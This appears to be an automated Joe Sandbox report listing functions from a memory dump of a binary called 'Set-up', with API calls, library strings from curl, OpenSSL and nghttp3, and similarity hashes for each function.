memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,?,0000000B), ref: 00AC4D30

Strings

0123456789, xrefs: 00AC490D, 00AC4915, 00AC4977, 00AC49A2, 00AC49EC, 00AC4A0D, 00AC4AB6, 00AC4AE1, 00AC4B1C, 00AC4B3D, 00AC4BCA, 00AC4BF3, 00AC4C2E, 00AC4C4F, 00AC4CD8, 00AC4CF8, 00AC4D20, 00AC4D2B

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memchr
String ID: 0123456789
API String ID: 3297308162-2793719750
Opcode ID: cf5b32a2119551d57964404c13ae23e58d77abd82638bc7c5cc3cbc11b2838ca
Instruction ID: 9f8e1a0f9c78e0c24a231951dcf7e8c79b681b545bee5bd1f63e9997cc4fd621
Opcode Fuzzy Hash: cf5b32a2119551d57964404c13ae23e58d77abd82638bc7c5cc3cbc11b2838ca
Instruction Fuzzy Hash: 74B117616883A15EDB259F1884B0FB67BD48F5A784F0A406DDDC48B3C3D729CD0A972A

Function 00BCA1B0 Relevance: 15.2, APIs: 3, Strings: 7, Instructions: 174stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C3B4B0: GetEnvironmentVariableW.KERNEL32(OPENSSL_WIN32_UTF8,00000000,00000000,?,?,00000000,00000000,00000000,?,00C47667,OPENSSL_MODULES), ref: 00C3B4CA
Part of subcall function 00C3B4B0: GetACP.KERNEL32(?,?,00000000,00000000,00000000,?,00C47667,OPENSSL_MODULES), ref: 00C3B4D4
Part of subcall function 00C3B4B0: MultiByteToWideChar.KERNEL32(00000000,00000000,00C47667,000000FF,00000000,00000000,?,?,00000000,00000000,00000000,?,00C47667,OPENSSL_MODULES), ref: 00C3B53B
Part of subcall function 00C3B4B0: MultiByteToWideChar.KERNEL32(00000000,00000000,00C47667,000000FF,-00000008,00000000,?,?,?,00000000,00000000,00000000,?,00C47667,OPENSSL_MODULES), ref: 00C3B5A1
Part of subcall function 00C3B4B0: GetEnvironmentVariableW.KERNEL32(-00000008,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00C47667,OPENSSL_MODULES), ref: 00C3B5B4
Part of subcall function 00C3B4B0: GetEnvironmentVariableW.KERNEL32(?,-00000008,00000000,?,?,?,?,00000000,00000000,00000000,?,00C47667,OPENSSL_MODULES), ref: 00C3B648
Part of subcall function 00C3B4B0: WideCharToMultiByte.KERNEL32 ref: 00C3B67F

Part of subcall function 00C3B4B0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(00C47667,?,?,00000000,00000000,00000000,?,00C47667,OPENSSL_MODULES), ref: 00C3B504

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00BCA1F0
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00BCA20B
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,00000000,00000000), ref: 00BCA25D

Strings

QLOGDIR, xrefs: 00BCA1BB
_%s.sqlog, xrefs: 00BCA2F0
ssl/quic/qlog.c, xrefs: 00BCA23E, 00BCA375, 00BCA38C
%02x, xrefs: 00BCA29F
OSSL_QFILTER, xrefs: 00BCA1CA
client, xrefs: 00BCA2E2
server, xrefs: 00BCA2E7, 00BCA2EF

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: ByteCharEnvironmentMultiVariableWide$strlen$getenvmemcpy
String ID: %02x$OSSL_QFILTER$QLOGDIR$_%s.sqlog$client$server$ssl/quic/qlog.c
API String ID: 2744062652-2540125403
Opcode ID: f9524956d515c9f6a42a893972e435905a0524bed7beb4859838f6601774b384
Instruction ID: 907b0ba6ea1289f91f0c74e22a87b36334b0d88190cd53d6c16f9c98fe49d8b9
Opcode Fuzzy Hash: f9524956d515c9f6a42a893972e435905a0524bed7beb4859838f6601774b384
Instruction Fuzzy Hash: 1F51E3E1A0435C6FE710A6259C46F3B76D99F90708F0804BCF98D9A243F669ED1497A3

Function 00A827E0 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 299stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00A8284C

Strings

url.c, xrefs: 00A82863, 00A828B0, 00A82CF9, 00A82DDE
%s%s%s, xrefs: 00A82834
No valid port number in connect to host string (%s), xrefs: 00A82C4B
Alt-svc connecting from [%s]%s:%d to [%s]%s:%d, xrefs: 00A82DA3
Please URL encode %% as %%25, see RFC 6874., xrefs: 00A829E3

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: strlen
String ID: %s%s%s$Alt-svc connecting from [%s]%s:%d to [%s]%s:%d$No valid port number in connect to host string (%s)$Please URL encode %% as %%25, see RFC 6874.$url.c
API String ID: 39653677-4104037097
Opcode ID: e52a33d04c8b4fbfaafa636ecbc76f2779d56de9600e1f67dfa53743a0a0f024
Instruction ID: 05e9708c65f6c5e1da0319d028b460142910825d9f37d16c6bd4347c9ef2db29
Opcode Fuzzy Hash: e52a33d04c8b4fbfaafa636ecbc76f2779d56de9600e1f67dfa53743a0a0f024
Instruction Fuzzy Hash: 3EA105B0A043409FDB28AF14D845B7ABBD6AF86394F08447DFC894B292E736DD41C792

Function 00A9A260 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 160networkCOMMON

Download Yara Rule

APIs

getpeername.WS2_32(?,?,00000080), ref: 00A9A376
WSAGetLastError.WS2_32 ref: 00A9A380

Part of subcall function 00A678B0: closesocket.WS2_32(?), ref: 00A678BB

Part of subcall function 00A9EF30: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000001,?,?), ref: 00A9EF6F

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A9A3D2
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A9A3D6

Strings

getpeername() failed with errno %d: %s, xrefs: 00A9A3A0
cf-socket.c, xrefs: 00A9A2E9
accepted_set(sock=%d, remote=%s port=%d), xrefs: 00A9A488
ssrem inet_ntop() failed with errno %d: %s, xrefs: 00A9A3F4

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _errno$ErrorLastclosesocketgetpeername
String ID: accepted_set(sock=%d, remote=%s port=%d)$cf-socket.c$getpeername() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
API String ID: 1501154218-2965463112
Opcode ID: b522a765f6c3e56c7876c91a075a0ec32de61dd0823d534ab894314c74456365
Instruction ID: a3e670882274a57956bf393f717fe68bd99925e6693def7f23e417ec1cc73c8a
Opcode Fuzzy Hash: b522a765f6c3e56c7876c91a075a0ec32de61dd0823d534ab894314c74456365
Instruction Fuzzy Hash: 55510731904740ABDB21DF24CC46BE677F4EF91314F048519F95C5B252EB72A985CBD2

Function 00B0A5A0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 124COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000001,?,0000000F), ref: 00B0A5FC
memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,0000000F), ref: 00B0A698
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00B0A6BF
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(i + 1 < blk->n,nghttp3_ksl.c,0000019B), ref: 00B0A6EB
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(lblk->n + rblk->n < NGHTTP3_KSL_MAX_NBLK,nghttp3_ksl.c,000001A2), ref: 00B0A700

Strings

nghttp3_ksl.c, xrefs: 00B0A6E1, 00B0A6F6
i + 1 < blk->n, xrefs: 00B0A6E6
lblk->n + rblk->n < NGHTTP3_KSL_MAX_NBLK, xrefs: 00B0A6FB

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _assertmemcpy$memmove
String ID: i + 1 < blk->n$lblk->n + rblk->n < NGHTTP3_KSL_MAX_NBLK$nghttp3_ksl.c
API String ID: 3463011695-2629231663
Opcode ID: 70e6ba715efcddc701f28eec0b264f3cdcdbeff9953be753c50ba11df8daf5bc
Instruction ID: e8dded402ab26ed8f9fac9c270f8b597244a2a8ed6ae80bcc03da8e8812f9477
Opcode Fuzzy Hash: 70e6ba715efcddc701f28eec0b264f3cdcdbeff9953be753c50ba11df8daf5bc
Instruction Fuzzy Hash: F44183756043049FC708EF18D88286ABBE6FF98314F08C96DE8898B356E671ED11DB52

Function 00CA2480 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77encryptionCOMMON

Download Yara Rule

APIs

CertGetCertificateContextProperty.CRYPT32(00000000,00000002,00000000), ref: 00CA2491
CertGetCertificateContextProperty.CRYPT32(00000000,00000002,00000000), ref: 00CA24C6
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00C9F5B4), ref: 00CA2529

Strings

ERR_CAPI_error, xrefs: 00CA24EF
engines/e_capi.c, xrefs: 00CA24A6, 00CA251C, 00CA2559
%lX, xrefs: 00CA2534
Error code= 0x, xrefs: 00CA2545
engines/e_capi_err.c, xrefs: 00CA24F6

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: CertCertificateContextProperty$ErrorLast
String ID: %lX$ERR_CAPI_error$Error code= 0x$engines/e_capi.c$engines/e_capi_err.c
API String ID: 2217977984-837018288
Opcode ID: 963fa51be6e39666315ff15103a23b9f299c38a4146c6163847fad8bca411c83
Instruction ID: 066dc8ec5c8fe88fed1c5cbf73ec56b8b847364a59db47becc7f7ad432d146d7
Opcode Fuzzy Hash: 963fa51be6e39666315ff15103a23b9f299c38a4146c6163847fad8bca411c83
Instruction Fuzzy Hash: 2911E771B80315B7F2203276BC47F6B3A6DEF56F49F044428F948BC1C7E5A7895096A2

Function 00AB2430 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 277stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00AB2666
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00AB2699
_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00AB26FB
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000018,?,?), ref: 00AB273A

Strings

hostip.c, xrefs: 00AB24B4, 00AB253F, 00AB2613, 00AB2626, 00AB2673, 00AB276D, 00AB27AF
Shuffling %i addresses, xrefs: 00AB24A6
:%u, xrefs: 00AB26CC

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: strlen$_time64memcpy
String ID: :%u$Shuffling %i addresses$hostip.c
API String ID: 2198566249-1766712111
Opcode ID: 601165af46b2d37e2ac8060d8734863ad663fb739c5dac19e096c92e60cdce35
Instruction ID: 20834ed0e103be2306e936bef13e02eaa1d4f380f0df3e2961481d0a43b9431d
Opcode Fuzzy Hash: 601165af46b2d37e2ac8060d8734863ad663fb739c5dac19e096c92e60cdce35
Instruction Fuzzy Hash: 47A1E0B5A147009FD734DF18C845BAAB7E9EF88314F18842EED8A87343E735E9518B91

Function 00DE6940 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 152COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00DE69F1
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000001,00000000,00000000,?,00000009,?), ref: 00DE6A11
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,000000FF,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00DE6A53
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00DE6AB6
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00DE6AC7
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00DE6ADA

Strings

UTF-8, xrefs: 00DE69AF

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _errno$abortmemcpymemset
String ID: UTF-8
API String ID: 3754757788-243350608
Opcode ID: 5ad62340cb73bd7bd8f142ac643dca753f6d1c93a8b6eeab9c4e58c610d55ec2
Instruction ID: b58be4b55baf927b28d0fc0fa3f7a7b50e42d0809c5eea6a9a6d79311effb079
Opcode Fuzzy Hash: 5ad62340cb73bd7bd8f142ac643dca753f6d1c93a8b6eeab9c4e58c610d55ec2
Instruction Fuzzy Hash: BF41F970A083815FDB11AF66DC95B2B77E5DFA5794F08892CF88987282E631DD04CB72

Function 00A6230E Relevance: 12.1, APIs: 4, Strings: 4, Instructions: 133stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00A62359
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00A62465
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00A624AB
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00A623EE

Part of subcall function 00A61A54: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A61A70

Strings

Memory allocation failed for decrypted data., xrefs: 00A62411
, xrefs: 00A62367
, xrefs: 00A6234F
, xrefs: 00A6234B

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: free$abortmallocstrlen
String ID: $ $ $Memory allocation failed for decrypted data.
API String ID: 673139954-1317699236
Opcode ID: 87c772e083e0a951d9afde07152c60ebd192314de98542cab91b0066ab73b2a0
Instruction ID: a51daa775e9b43293f5d58c2ecec627ed07b5aa3007abac5f43dfc5e45228b49
Opcode Fuzzy Hash: 87c772e083e0a951d9afde07152c60ebd192314de98542cab91b0066ab73b2a0
Instruction Fuzzy Hash: E55192B49047099FCB00EFA9C58599EBBF0FF88300F14895AE8989B315E774D9449F92

Function 00C7E110 Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 90stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00C7E16C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00C7E17B

Strings

crypto/ui/ui_lib.c, xrefs: 00C7E195
:, xrefs: 00C7E15C
, xrefs: 00C7E14D
er , xrefs: 00C7E13D
for, xrefs: 00C7E154
Ente, xrefs: 00C7E145

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: strlen
String ID: $ for$:$Ente$crypto/ui/ui_lib.c$er
API String ID: 39653677-1187194756
Opcode ID: 499467355d9e94ce5679c1a25723b35431b96c5f7390ea76e9512144d320e380
Instruction ID: 76c56f37386024383bc0498c5bf98de1d2fc5352b8cfdd4fcd1427e58fb8763a
Opcode Fuzzy Hash: 499467355d9e94ce5679c1a25723b35431b96c5f7390ea76e9512144d320e380
Instruction Fuzzy Hash: 1D21B6F3D052106BD2106A56AC42E6F77ACDD95394F498479FC4C96243F631CA14D3A3

Function 00A76330 Relevance: 12.1, APIs: 8, Instructions: 77sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00A7D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,00A701B1), ref: 00A7D8E2

_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00AA420E,?,?), ref: 00A76350
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(00AA420E,?,?,?,?,?,?,?,?,?,00AA420E,?,?), ref: 00A7635B
MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00A76369
Sleep.KERNEL32(00000001), ref: 00A763B2
